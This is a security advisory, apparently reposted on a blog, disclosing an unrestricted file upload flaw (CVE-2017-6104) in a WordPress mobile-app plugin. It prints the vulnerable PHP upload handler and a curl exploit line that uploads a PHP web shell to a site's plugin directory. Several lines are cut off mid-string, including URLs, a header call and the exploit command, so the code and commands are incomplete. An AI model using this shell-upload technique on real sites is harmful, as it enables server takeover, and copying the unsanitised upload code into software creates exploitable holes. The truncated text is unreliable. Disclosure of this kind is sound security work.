Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/
Vendor: https://profiles.wordpress.
Notified: 2017-02-27
Vendor Contact:
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/
It also doesn't sanitize the file upload against executable code.
<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-
require_once('function.php');
if ($_FILES['file']['name']) {
if (!$_FILES['file']['error']) {
$name = md5(rand(100, 200));
$ext = explode('.', $_FILES['file']['name']);
$filename = $name . '.' . $ext[1];
$destination = 'images/' . $filename;
$location = $_FILES["file"]["tmp_name"];
move_uploaded_file($location, $destination);
echo $plugin_url.'/server/images/' . $filename;
}
else {
echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];
}
}
CVEIDs: CVE-2017-6104
Exploit: $
curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/
http://example.com/wordpress/
https://github.com/lcashdol/
URL: http://www.vapidlabs.com/
Credit: Larry W. Cashdollar, @_larry0
https://github.com/lcashdol/
Komentarų nėra:
Rašyti komentarą